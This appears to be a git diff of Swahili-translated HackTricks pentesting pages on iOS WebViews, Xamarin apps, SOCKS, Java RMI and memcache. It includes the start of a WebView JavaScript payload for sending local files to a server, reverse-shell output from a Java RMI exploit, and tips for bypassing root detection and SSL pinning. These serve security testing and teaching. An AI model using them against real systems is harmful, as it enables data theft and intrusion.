Msimbo wa ukurasa huu umetolewa kutoka [hapa](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Angalia ukurasa kwa maelezo zaidi.
## Aina za WebViews
@ -10,7 +10,7 @@ WebViews zinatumika ndani ya programu kuonyesha maudhui ya wavuti kwa njia ya mw
- **UIWebView**, ambayo haitumiki tena kuanzia iOS 12 kwa sababu ya ukosefu wa msaada wa kuzima **JavaScript**, ikifanya iwe rahisi kwa uingizaji wa skripti na mashambulizi ya **Cross-Site Scripting (XSS)**.
- **WKWebView** ni chaguo linalopendekezwa kwa kuingiza maudhui ya wavuti katika programu, ikitoa udhibiti ulioimarishwa juu ya maudhui na vipengele vya usalama. **JavaScript** imewezeshwa kwa default, lakini inaweza kuzimwa ikiwa inahitajika. Pia inasaidia vipengele vya kuzuia **JavaScript** kufungua madirisha kiotomatiki na kuhakikisha kuwa maudhui yote yanapakiwa kwa usalama. Zaidi ya hayo, usanifu wa **WKWebView** hupunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
- **WKWebView** ni chaguo linalopendekezwa kwa kuingiza maudhui ya wavuti katika programu, ikitoa udhibiti ulioimarishwa juu ya maudhui na vipengele vya usalama. **JavaScript** imewezeshwa kwa default, lakini inaweza kuzimwa ikiwa inahitajika. Pia inasaidia vipengele vya kuzuia **JavaScript** kufungua madirisha kiotomatiki na kuhakikisha kwamba maudhui yote yanapakiwa kwa usalama. Zaidi ya hayo, usanifu wa **WKWebView** hupunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
- **SFSafariViewController** inatoa uzoefu wa kuvinjari wavuti ulio sanifishwa ndani ya programu, inayotambulika kwa mpangilio wake maalum ikiwa ni pamoja na uwanja wa anwani wa kusoma tu, vitufe vya kushiriki na urambazaji, na kiungo cha moja kwa moja kufungua maudhui katika Safari. Tofauti na **WKWebView**, **JavaScript** haiwezi kuzimwa katika **SFSafariViewController**, ambayo pia inashiriki kuki na data na Safari, ikihifadhi faragha ya mtumiaji kutoka kwa programu. Inapaswa kuonyeshwa kwa wazi kulingana na miongozo ya Duka la Programu.
```javascript
@ -31,7 +31,7 @@ Katika mchakato wa kuchunguza mipangilio ya **WebViews**, aina mbili kuu zinazin
```bash
$ rabin2 -zz ./WheresMyBrowser | egrep "UIWebView$"
```
Amri hii husaidia katika kutafuta matukio ya **UIWebView** kwa kutafuta nyuzi za maandiko zinazohusiana nayo katika binary.
Amri hii husaidia katika kutafuta matukio ya **UIWebView** kwa kutafuta mfuatano wa maandiko yanayohusiana nayo katika binary.
- **Utambuzi wa WKWebView**
```bash
@ -45,7 +45,7 @@ $ rabin2 -zzq ./WheresMyBrowser | egrep "WKWebView.*frame"
```
#### **Uthibitisho wa Mipangilio ya JavaScript**
Kwa **WKWebView**, inasisitizwa kwamba kuzima JavaScript ni njia bora isipokuwa inahitajika. Faili ya binary iliyokusanywa inatafutwa ili kuthibitisha kwamba mali ya `javaScriptEnabled` imewekwa kuwa `false`, kuhakikisha kwamba JavaScript imezimwa:
Kwa **WKWebView**, inasisitizwa kwamba kuzima JavaScript ni njia bora isipokuwa inahitajika. Binafsi iliyokusanywa inatafutwa ili kuthibitisha kwamba mali ya `javaScriptEnabled` imewekwa kuwa `false`, kuhakikisha kwamba JavaScript imezimwa:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled"
```
@ -55,9 +55,9 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled"
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
```
### **Uchambuzi wa Kineti**
### **Maelezo ya Uchambuzi wa Kihisia**
Uchambuzi wa kineti unahusisha kukagua heap kwa ajili ya WebView instances na mali zao. Skripti inayoitwa `webviews_inspector.js` inatumika kwa kusudi hili, ikilenga `UIWebView`, `WKWebView`, na `SFSafariViewController` instances. Inarekodi taarifa kuhusu instances zilizopatikana, ikiwa ni pamoja na URLs na mipangilio inayohusiana na JavaScript na maudhui salama.
Uchambuzi wa kihisia unahusisha kukagua heap kwa ajili ya WebView instances na mali zao. Skripti inayoitwa `webviews_inspector.js` inatumika kwa kusudi hili, ikilenga `UIWebView`, `WKWebView`, na `SFSafariViewController` instances. Inarekodi taarifa kuhusu instances zilizopatikana, ikiwa ni pamoja na URLs na mipangilio inayohusiana na JavaScript na maudhui salama.
Ukaguzi wa heap unaweza kufanywa kwa kutumia `ObjC.choose()` ili kubaini WebView instances na kuangalia mali za `javaScriptEnabled` na `hasonlysecurecontent`.
```javascript:webviews_inspector.js
@ -114,17 +114,17 @@ frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js
**Matokeo Muhimu**:
- Mifano ya WebViews imefanikiwa kupatikana na kukaguliwa.
- Uthibitisho wa kuwezesha JavaScript na mipangilio ya maudhui salama umefanywa.
- Uwezeshaji wa JavaScript na mipangilio ya maudhui salama imethibitishwa.
Muhtasari huu unajumuisha hatua muhimu na amri zinazohusika katika kuchambua usanidi wa WebView kupitia mbinu za statiki na dinamik, zikilenga kwenye vipengele vya usalama kama kuwezesha JavaScript na kugundua maudhui mchanganyiko.
Muhtasari huu unajumuisha hatua muhimu na amri zinazohusika katika kuchambua usanidi wa WebView kupitia mbinu za statiki na za dinamik, zikilenga kwenye vipengele vya usalama kama uwezeshaji wa JavaScript na ugunduzi wa maudhui mchanganyiko.
## Usimamizi wa Protokali za WebView
Kushughulikia maudhui katika WebViews ni kipengele muhimu, hasa linapokuja suala la protokali mbalimbali kama `http(s)://`, `file://`, na `tel://`. Protokali hizi zinawezesha upakiaji wa maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kuathiri jina la faili au njia na kutoka kuhariri maudhui yenyewe.
Kushughulikia maudhui katika WebViews ni kipengele muhimu, hasa linapokuja suala la protokali mbalimbali kama `http(s)://`, `file://`, na `tel://`. Protokali hizi zinawawezesha kupakia maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kuathiri jina la faili au njia na kutoka kuhariri maudhui yenyewe.
**WebViews** hutoa mbinu tofauti za upakiaji wa maudhui. Kwa **UIWebView**, ambayo sasa imeondolewa, mbinu kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` zinatumika. **WKWebView**, kwa upande mwingine, inatumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Mbinu kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kwa kawaida hutumiwa kwa upakiaji wa faili za ndani. Mbinu `loadFileURL:allowingReadAccessToURL:` inajulikana hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ambayo inaweza kufichua data nyeti ikiwa saraka imeainishwa.
**WebViews** hutoa mbinu tofauti za kupakia maudhui. Kwa **UIWebView**, ambayo sasa imeondolewa, mbinu kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` zinatumika. **WKWebView**, kwa upande mwingine, inatumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Mbinu kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kwa kawaida hutumiwa kwa kupakia faili za ndani. Mbinu `loadFileURL:allowingReadAccessToURL:` inajulikana hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ambayo inaweza kufichua data nyeti ikiwa saraka imeainishwa.
Ili kupata mbinu hizi katika msimbo wa chanzo au binary iliyokusanywa, amri kama ifuatayo zinaweza kutumika:
Ili kupata mbinu hizi katika msimbo wa chanzo au binary iliyokusanywa, amri kama ifuatavyo zinaweza kutumika:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:
@ -149,7 +149,7 @@ console.log('done for WKWebView!');
}
});
```
Mwisho, mfano wa payload ya JavaScript inayolenga kuhamasisha faili za ndani unaonyesha hatari ya usalama inayoweza kutokea kutokana na WebViews zisizo na usanidi mzuri. Payload hii inakodisha maudhui ya faili katika muundo wa hex kabla ya kuyatumia kwa seva, ikisisitiza umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
Mwisho, mfano wa payload ya JavaScript inayolenga kutoa faili za ndani unaonyesha hatari ya usalama inayoweza kutokea kutokana na WebViews zisizowekwa vizuri. Payload hii inakodisha maudhui ya faili katika muundo wa hex kabla ya kuyatumia kwa seva, ikisisitiza umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
```javascript
String.prototype.hexEncode = function () {
var hex, i
@ -262,12 +262,12 @@ Ili kufanikisha ufuatiliaji wa maudhui ya wavuti ndani ya iOS webviews, inahitaj
- **Preparation on macOS Device**: Kwenye mashine yako ya maendeleo ya macOS, lazima uwashe zana za maendeleo ndani ya Safari. Fungua Safari, upate **Safari > Preferences > Advanced**, na chagua chaguo la _Show Develop menu_.
- **Connection and Debugging**: Baada ya kuunganisha kifaa chako cha iOS na kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kufuatilia. Tembea hadi _Develop_ kwenye menyu ya Safari, piga juu ya jina la kifaa chako cha iOS ili kuona orodha ya matukio ya webview, na chagua tukio unalotaka kukagua. Dirisha jipya la Safari Web Inspector litafunguliwa kwa ajili ya kusudi hili.
- **Connection and Debugging**: Baada ya kuunganisha kifaa chako cha iOS na kompyuta yako ya macOS na kuzindua programu yako, tumia Safari kwenye kifaa chako cha macOS kuchagua webview unayotaka kufuatilia. Tembea hadi _Develop_ kwenye menyu ya Safari, piga juu ya jina la kifaa chako cha iOS ili kuona orodha ya matukio ya webview, na chagua tukio unalotaka kukagua. Dirisha jipya la Safari Web Inspector litafunguliwa kwa ajili ya hili.
Hata hivyo, kuwa makini na mipaka:
- Ufuatiliaji kwa njia hii unahitaji kifaa cha macOS kwani unategemea Safari.
- Ni webviews pekee katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinazostahili kufuatiliwa. Webviews katika programu zilizowekwa kupitia Duka la Programu au Apple Configurator cannot be debugged in this manner.
- Ni webviews tu katika programu zilizopakiwa kwenye kifaa chako kupitia Xcode zinazostahili kufuatiliwa. Webviews katika programu zilizowekwa kupitia Duka la Programu au Apple Configurator haziwezi kufuatiliwa kwa njia hii.
## References

30
src/mobile-pentesting/xamarin-apps.md
View File

@ -8,8 +8,8 @@ Xamarin ni **jukwaa la chanzo wazi** lililoundwa kwa ajili ya waendelezaji **kuu
### Muktadha wa Xamarin
- Kwa **Android**, Xamarin inajumuisha na Android na Java namespaces kupitia .NET bindings, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Managed Callable Wrappers (MCW) na Android Callable Wrappers (ACW) hurahisisha mawasiliano kati ya Mono na ART, zote zikiwa zimejengwa kwenye kernel ya Linux.
- Kwa **iOS**, programu zinafanya kazi chini ya mazingira ya utekelezaji ya Mono, zikitumika kwa uundaji wa AHEAD OF TIME (AOT) kamili kubadilisha C# .NET code kuwa lugha ya mkusanyiko wa ARM. Mchakato huu unafanya kazi pamoja na Objective-C Runtime kwenye kernel inayofanana na UNIX.
- Kwa **Android**, Xamarin inajumuisha na Android na Java namespaces kupitia .NET bindings, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Managed Callable Wrappers (MCW) na Android Callable Wrappers (ACW) husaidia mawasiliano kati ya Mono na ART, zote zikiwa zimejengwa kwenye kernel ya Linux.
- Kwa **iOS**, programu zinafanya kazi chini ya mazingira ya utekelezaji ya Mono, zikitumika kwa uundaji wa Ahead of Time (AOT) kamili kubadilisha C# .NET code kuwa lugha ya mkusanyiko wa ARM. Mchakato huu unafanya kazi pamoja na Objective-C Runtime kwenye kernel inayofanana na UNIX.
### .NET Runtime na Mono Framework
@ -21,14 +21,14 @@ Xamarin ni **jukwaa la chanzo wazi** lililoundwa kwa ajili ya waendelezaji **kuu
Ukombozi hubadilisha msimbo ulioandikwa kuwa msimbo wa chanzo. Katika Windows, dirisha la Modules katika Visual Studio linaweza kutambua moduli za ukombozi, kuruhusu ufikiaji wa moja kwa moja wa msimbo wa wahusika wengine na kutoa msimbo wa chanzo kwa ajili ya uchambuzi.
#### JIT vs AOT Ukombozi
#### JIT vs AOT Ukompaji
- **Android** inasaidia Just-In-Time (JIT) na Ahead-Of-Time (AOT) ukombozi, ikiwa na hali ya Hybrid AOT kwa ajili ya kasi bora ya utekelezaji. AOT kamili ni ya leseni za Enterprise pekee.
- **iOS** inatumia tu AOT ukombozi kutokana na vizuizi vya Apple juu ya utekelezaji wa msimbo wa dynamic.
- **Android** inasaidia Just-In-Time (JIT) na Ahead-Of-Time (AOT) ukompaji, ikiwa na hali ya Hybrid AOT kwa kasi bora ya utekelezaji. AOT kamili ni ya leseni za Enterprise pekee.
- **iOS** inatumia tu AOT ukompaji kutokana na vizuizi vya Apple juu ya utekelezaji wa msimbo wa dinamik.
### Kutolewa kwa faili za dll kutoka APK/IPA
Ili kufikia makusanyo katika APK/IPA, fungua faili na chunguza saraka ya makusanyo. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
Ili kufikia makusanyo katika APK/IPA, fungua faili na uchunguze saraka ya makusanyo. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
```bash
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
@ -37,28 +37,28 @@ Hata hivyo, wakati mwingine, inapatikana faili za `assemblies.blob` na `assembli
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
```
iOS dll files zinapatikana kwa urahisi kwa ajili ya decompilation, zikifunua sehemu kubwa za msimbo wa programu, ambayo mara nyingi inashiriki msingi wa kawaida katika majukwaa tofauti.
Faili za iOS dll zinapatikana kwa urahisi kwa ajili ya decompilation, zikifunua sehemu kubwa za msimbo wa programu, ambayo mara nyingi inashiriki msingi wa kawaida kati ya majukwaa tofauti.
### Static Analysis
### Uchambuzi wa Kijamii
Mara tu `.dll`s zinapopatikana inawezekana kuchambua msimbo wa .Net kwa njia ya statically kwa kutumia zana kama [**dnSpy**](https://github.com/dnSpy/dnSpy) **au** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **ambayo** itaruhusu kubadilisha msimbo wa programu. Hii inaweza kuwa ya manufaa sana kubadilisha programu ili kupita ulinzi kwa mfano.\
Kumbuka kwamba baada ya kubadilisha programu utahitaji kuipakia tena na kuisaini tena.
Mara tu `.dll`s zinapopatikana, inawezekana kuchambua msimbo wa .Net kwa njia ya statiki kwa kutumia zana kama [**dnSpy**](https://github.com/dnSpy/dnSpy) **au** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **ambazo** zitakuruhusu kubadilisha msimbo wa programu. Hii inaweza kuwa ya manufaa sana kubadilisha programu ili kupita ulinzi kwa mfano.\
Kumbuka kwamba baada ya kubadilisha programu, utahitaji kuipakia tena na kuisaini tena.
### Dynamic Analysis
### Uchambuzi wa Kijamii
Dynamic analysis inahusisha kuangalia SSL pinning na kutumia zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa mabadiliko ya wakati wa kukimbia ya binary ya .NET katika programu za Xamarin. Skripti za Frida zinapatikana ili kupita ugunduzi wa root au SSL pinning, zikiongeza uwezo wa uchambuzi.
Uchambuzi wa kijamii unahusisha kuangalia SSL pinning na kutumia zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa mabadiliko ya wakati wa kukimbia ya binary ya .NET katika programu za Xamarin. Mifano ya Frida inapatikana ili kupita ugunduzi wa root au SSL pinning, ikiongeza uwezo wa uchambuzi.
Skripti nyingine za Frida zinazovutia:
Mifano mingine ya kuvutia ya Frida:
- [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/)
- [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
- [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
### Resigning
### Kusaini Tena
Zana [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) inarahisisha kusaini APK nyingi kwa kutumia funguo sawa, na inaweza kutumika kusaini tena programu baada ya mabadiliko kufanywa kwake.
## Further information
## Taarifa Zaidi
- [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
- [https://thecobraden.com/posts/unpacking_xamarin_assembly_stores/](https://thecobraden.com/posts/unpacking_xamarin_assembly_stores/)

12
src/network-services-pentesting/1080-pentesting-socks.md
View File

@ -2,15 +2,15 @@
{{#include ../banners/hacktricks-training.md}}
## Taarifa za Msingi
## Basic Information
**SOCKS** ni itifaki inayotumika kwa ajili ya kuhamasisha data kati ya mteja na seva kupitia proxy. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uthibitishaji ambacho ni hiari, kinachoruhusu watumiaji walioidhinishwa pekee kufikia seva. Kimsingi inashughulikia proxying ya muunganisho wa TCP na kupeleka pakiti za UDP, ikifanya kazi katika safu ya kikao (Safu ya 5) ya mfano wa OSI.
**SOCKS** ni protokali inayotumika kwa ajili ya kuhamasisha data kati ya mteja na seva kupitia proxy. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uthibitishaji cha hiari, kinachoruhusu watumiaji walioidhinishwa pekee kufikia seva. Kimsingi inashughulikia proxying ya muunganisho wa TCP na kupeleka pakiti za UDP, ikifanya kazi katika safu ya kikao (Layer 5) ya mfano wa OSI.
**Bandari ya Kawaida:** 1080
**Porti ya Kawaida:** 1080
## Uhesabuji
## Enumeration
### Ukaguzi wa Uthibitishaji
### Authentication Check
```bash
nmap -p 1080 <ip> --script socks-auth-info
```
@ -36,7 +36,7 @@ PORT STATE SERVICE
```
## Tunneling na Port Forwarding
### Msingi wa matumizi ya proxychains
### Matumizi ya msingi ya proxychains
Weka proxy chains kutumia socks proxy
```

22
src/network-services-pentesting/1099-pentesting-java-rmi.md
View File

@ -4,7 +4,7 @@
## Basic Information
_Java Remote Method Invocation_, au _Java RMI_, ni mekanizma ya _RPC_ iliyo na mwelekeo wa vitu inayoruhusu kitu kilichopo katika _Java virtual machine_ moja kuita mbinu kwenye kitu kilichopo katika _Java virtual machine_ nyingine. Hii inawawezesha waendelezaji kuandika programu zilizogawanywa kwa kutumia mtindo wa mwelekeo wa vitu. Utangulizi mfupi wa _Java RMI_ kutoka mtazamo wa mashambulizi unaweza kupatikana katika [hii blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).
_Java Remote Method Invocation_, au _Java RMI_, ni mekanizma ya _RPC_ iliyo na mwelekeo wa vitu inayoruhusu kitu kilichopo katika _Java virtual machine_ moja kuita mbinu kwenye kitu kilichopo katika _Java virtual machine_ nyingine. Hii inawawezesha waendelezaji kuandika programu zilizogawanywa wakitumia mtindo wa mwelekeo wa vitu. Utangulizi mfupi wa _Java RMI_ kutoka mtazamo wa mashambulizi unaweza kupatikana katika [hii blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).
**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
```
@ -14,20 +14,20 @@ PORT STATE SERVICE VERSION
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
```
Kawaida, sehemu za _Java RMI_ za kawaida (maktaba ya _RMI_ na mfumo wa _Activation_) zimefungwa kwenye bandari za kawaida. _Vitu vya mbali_ vinavyotekeleza programu halisi ya _RMI_ kawaida vimefungwa kwenye bandari za nasibu kama inavyoonyeshwa kwenye matokeo hapo juu.
Kawaida, ni sehemu za _Java RMI_ za kawaida tu (_RMI Registry_ na _Activation System_) ndizo zinazofungwa kwenye bandari za kawaida. _Vitu vya mbali_ vinavyotekeleza programu halisi ya _RMI_ kawaida vinafungwa kwenye bandari za nasibu kama inavyoonyeshwa kwenye matokeo hapo juu.
_nmap_ wakati mwingine ina shida kutambua huduma za _RMI_ zilizolindwa na _SSL_. Ikiwa unakutana na huduma isiyojulikana ya ssl kwenye bandari ya kawaida ya _RMI_, unapaswa kuchunguza zaidi.
## Vipengele vya RMI
## RMI Components
Kwa maneno rahisi, _Java RMI_ inaruhusu mendelezi kufanya _kitu cha Java_ kupatikana kwenye mtandao. Hii inafungua bandari ya _TCP_ ambapo wateja wanaweza kuungana na kuita mbinu kwenye kitu husika. Ingawa hii inasikika kuwa rahisi, kuna changamoto kadhaa ambazo _Java RMI_ inahitaji kutatua:
Kwa maneno rahisi, _Java RMI_ inamruhusu mendelezi kufanya _Java object_ ipatikane kwenye mtandao. Hii inafungua bandari ya _TCP_ ambapo wateja wanaweza kuungana na kuita mbinu kwenye kitu husika. Ingawa hii inasikika kuwa rahisi, kuna changamoto kadhaa ambazo _Java RMI_ inahitaji kutatua:
1. Ili kutuma wito wa mbinu kupitia _Java RMI_, wateja wanahitaji kujua anwani ya IP, bandari inayosikiliza, darasa au kiolesura kilichotekelezwa na `ObjID` ya kitu kilichokusudiwa ( `ObjID` ni kitambulisho cha kipekee na nasibu ambacho kinaundwa wakati kitu kinapatikana kwenye mtandao. Inahitajika kwa sababu _Java RMI_ inaruhusu vitu vingi kusikiliza kwenye bandari moja ya _TCP_).
1. Ili kutuma wito wa mbinu kupitia _Java RMI_, wateja wanahitaji kujua anwani ya IP, bandari inayosikiliza, darasa au interface iliyotekelezwa na `ObjID` ya kitu kilichokusudiwa ( `ObjID` ni kitambulisho cha kipekee na nasibu ambacho kinaundwa wakati kitu kinapatikana kwenye mtandao. Inahitajika kwa sababu _Java RMI_ inaruhusu vitu vingi kusikiliza kwenye bandari moja ya _TCP_).
2. Wateja wa mbali wanaweza kugawa rasilimali kwenye seva kwa kuita mbinu kwenye kitu kilichofichuliwa. _Java virtual machine_ inahitaji kufuatilia ni zipi kati ya rasilimali hizi bado zinatumika na zipi kati yao zinaweza kukusanywa kama taka.
Changamoto ya kwanza inatatuliwa na _RMI registry_, ambayo kimsingi ni huduma ya upatanishi kwa _Java RMI_. _RMI registry_ yenyewe pia ni _huduma ya RMI_, lakini kiolesura kilichotekelezwa na `ObjID` ni thabiti na inajulikana na wateja wote wa _RMI_. Hii inaruhusu wateja wa _RMI_ kutumia _RMI registry_ kwa kujua tu bandari husika ya _TCP_.
Changamoto ya kwanza inatatuliwa na _RMI registry_, ambayo kimsingi ni huduma ya upatanishi kwa _Java RMI_. _RMI registry_ yenyewe pia ni _RMI service_, lakini interface iliyotekelezwa na `ObjID` ni thabiti na inajulikana na wateja wote wa _RMI_. Hii inaruhusu wateja wa _RMI_ kutumia _RMI_ registry kwa kujua tu bandari husika ya _TCP_.
Wakati waendelezaji wanataka kufanya _vitu vya Java_ kupatikana ndani ya mtandao, kawaida huviunganisha na _RMI registry_. _Registry_ inahifadhi taarifa zote zinazohitajika kuungana na kitu (anwani ya IP, bandari inayosikiliza, darasa au kiolesura kilichotekelezwa na thamani ya `ObjID`) na inafanya ipatikane chini ya jina linaloweza kusomeka na binadamu (jina lililofungwa). Wateja wanaotaka kutumia _huduma ya RMI_ wanauliza _RMI registry_ kwa jina lililofungwa husika na registry inarudisha taarifa zote zinazohitajika kuungana. Hivyo, hali ni sawa na huduma ya kawaida ya _DNS_. Orodha ifuatayo inaonyesha mfano mdogo:
Wakati waendelezaji wanataka kufanya _Java objects_ zao zipatikane ndani ya mtandao, kawaida wanazifunga kwenye _RMI registry_. _Registry_ inahifadhi taarifa zote zinazohitajika kuungana na kitu (anwani ya IP, bandari inayosikiliza, darasa au interface iliyotekelezwa na thamani ya `ObjID`) na inafanya ipatikane chini ya jina linaloweza kusomeka na binadamu (jina lililofungwa). Wateja wanaotaka kutumia _RMI service_ wanauliza _RMI registry_ kwa jina lililofungwa husika na registry inarudisha taarifa zote zinazohitajika kuungana. Hivyo, hali ni sawa na huduma ya kawaida ya _DNS_. Orodha ifuatayo inaonyesha mfano mdogo:
```java
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
@ -51,7 +51,7 @@ e.printStackTrace();
}
}
```
Changamoto ya pili iliyotajwa hapo juu inatatuliwa na _Distributed Garbage Collector_ (_DGC_). Hii ni huduma nyingine ya _RMI_ yenye thamani ya `ObjID` inayojulikana na inapatikana kwenye kila _RMI endpoint_. Wakati _RMI client_ inaanza kutumia _RMI service_, inatuma taarifa kwa _DGC_ kwamba _remote object_ husika inatumika. _DGC_ inaweza kufuatilia idadi ya marejeleo na inaweza kusafisha vitu ambavyo havitumiki.
Changamoto ya pili iliyotajwa hapo juu inatatuliwa na _Distributed Garbage Collector_ (_DGC_). Hii ni huduma nyingine ya _RMI_ yenye thamani ya `ObjID` inayojulikana na inapatikana kwenye kila _RMI endpoint_. Wakati _RMI client_ inaanza kutumia _RMI service_, inatuma taarifa kwa _DGC_ kwamba _remote object_ husika inatumika. _DGC_ inaweza kufuatilia idadi ya marejeleo na inaweza kusafisha vitu visivyotumika.
Pamoja na _Activation System_ iliyoshindikana, hizi ndizo sehemu tatu za kawaida za _Java RMI_:
@ -140,7 +140,7 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
Hata wakati hakuna udhaifu ulioainishwa wakati wa kuhesabu, huduma za _RMI_ zilizopo zinaweza bado kufichua kazi hatari. Zaidi ya hayo, licha ya mawasiliano ya _RMI_ na vipengele vya kawaida vya _RMI_ kulindwa na filters za deserialization, wakati wa kuzungumza na huduma za _RMI_ za kawaida, filters hizo kwa kawaida hazipo. Kujua saini sahihi za mbinu kwenye huduma za _RMI_ ni muhimu.
Kwa bahati mbaya, _Java RMI_ haisaidii kuhesabu mbinu kwenye _objects_ za mbali. Hata hivyo, inawezekana kufanyia kazi saini za mbinu kwa kutumia zana kama [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) au [rmiscout](https://github.com/BishopFox/rmiscout):
Kwa bahati mbaya, _Java RMI_ haisaidii kuhesabu mbinu kwenye _vitu vya mbali_. Hata hivyo, inawezekana kufanyia kazi saini za mbinu kwa kutumia zana kama [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) au [rmiscout](https://github.com/BishopFox/rmiscout):
```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
@ -198,14 +198,14 @@ Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
```
Maelezo zaidi yanaweza kupatikana katika makala haya:
Maelezo zaidi yanaweza kupatikana katika makala hizi:
- [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
- [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [rmiscout](https://bishopfox.com/blog/rmiscout)
Mbali na kukisia, unapaswa pia kutafuta katika injini za utafutaji au _GitHub_ kwa ajili ya interface au hata utekelezaji wa huduma ya _RMI_ uliokutana nayo. _Jina lililofungwa_ na jina la darasa au interface iliyotekelezwa yanaweza kuwa na msaada hapa.
Mbali na kukisia, unapaswa pia kutafuta katika injini za utafutaji au _GitHub_ kwa ajili ya interface au hata utekelezaji wa huduma ya _RMI_ uliokutana nayo. _Jina lililofungwa_ na jina la darasa au interface iliyotekelezwa linaweza kuwa na msaada hapa.
## Known Interfaces

14
src/network-services-pentesting/11211-memcache/README.md
View File

@ -59,7 +59,7 @@ Katika eneo la memcache, protokali inayosaidia katika kuandaa data kwa slabs, am
2. Kuna kikomo cha ukurasa mmoja kwa darasa la slab, kinacholingana na 1MB ya data.
3. Kipengele hiki si rasmi na kinaweza kusitishwa wakati wowote, kama ilivyojadiliwa katika [mijadala ya jamii](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM).
Kikomo cha kutoa 1MB tu kutoka kwa data inayoweza kuwa gigabytes ni muhimu sana. Hata hivyo, kazi hii bado inaweza kutoa mwanga juu ya mifumo ya matumizi ya funguo, kulingana na mahitaji maalum. Kwa wale wasiokuwa na hamu sana na mitambo, kutembelea [sehemu ya zana](https://lzone.de/cheat-sheet/memcached#tools) kunaonyesha zana za kutoa kwa kina. Vinginevyo, mchakato wa kutumia telnet kwa mwingiliano wa moja kwa moja na mipangilio ya memcached umeelezwa hapa chini.
Kikomo cha kutoa tu 1MB kutoka kwa data inayoweza kuwa gigabytes ni muhimu sana. Hata hivyo, kazi hii bado inaweza kutoa mwanga juu ya mifumo ya matumizi ya funguo, kulingana na mahitaji maalum. Kwa wale wasiokuwa na hamu sana na mitambo, kutembelea [sehemu ya zana](https://lzone.de/cheat-sheet/memcached#tools) kunaonyesha zana za kutoa kwa kina. Vinginevyo, mchakato wa kutumia telnet kwa mwingiliano wa moja kwa moja na mipangilio ya memcached umeelezwa hapa chini.
### **Inavyofanya Kazi**
@ -84,7 +84,7 @@ Kutekeleza amri "stats slabs" baada ya kuongeza ufunguo kunatoa takwimu za kina
stats slabs
[...]
```
Matokeo haya yanaonyesha aina za slab zinazofanya kazi, vipande vinavyotumika, na takwimu za uendeshaji, zikitoa mwanga juu ya ufanisi wa operesheni za kusoma na kuandika.
